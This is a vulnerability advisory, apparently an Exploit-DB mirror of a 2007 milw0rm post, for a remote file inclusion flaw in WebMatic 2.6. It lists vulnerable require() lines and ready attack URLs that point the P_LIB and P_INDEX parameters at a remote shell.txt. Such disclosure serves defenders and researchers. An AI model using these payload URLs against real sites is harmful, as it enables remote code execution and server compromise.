WebMatic 2.6

vendor:

WebMatic

by:

MadNet

7.5

CVSS

HIGH

RFI

CWE

Product Name: WebMatic

Affected Version From: 2.6

Affected Version To: 2.6

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

The WebMatic 2.6 application is vulnerable to a remote file inclusion (RFI) vulnerability. This vulnerability allows an attacker to include arbitrary files from remote servers, potentially leading to remote code execution.

Mitigation:

The vendor has not provided a patch or mitigation for this vulnerability. It is recommended to upgrade to a newer version or apply security measures such as input validation and output encoding to prevent RFI attacks.

Source

Exploit-DB raw data:

-------------------------------------********************----------------------------------------------------------
#Title : WebMatic 2.6

#Author : MadNet

#Contact : MadNet[at]Hackertr[Dot]org

#S.Page : www.valarsoft.com  :)

--------------------------------------*******************-----------------------------------------------------------


Error1 :  require($P_LIB."lib_album.php");

Error2 :  require($P_INDEX."page_album.inc");


[[RFI]]

http://[target]/[path]/core/index/index_album.php?P_LIB=[Shell]

http://[target]/[path]/core/index/index_album.php?P_INDEX=[Shell]

-------------------------------------------------

Example1 : [Path]/core/index/index_album.php?P_LIB=http://[path]/shell.txt

Example2 : [Path]/core/index/index_album.php?P_INDEX=http://[path]/shell.txt



''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''

-- MadNet From Turkey & Cyber-Sabotger Orgeneral  --


--Thanks Milw0rm

# milw0rm.com [2007-02-07]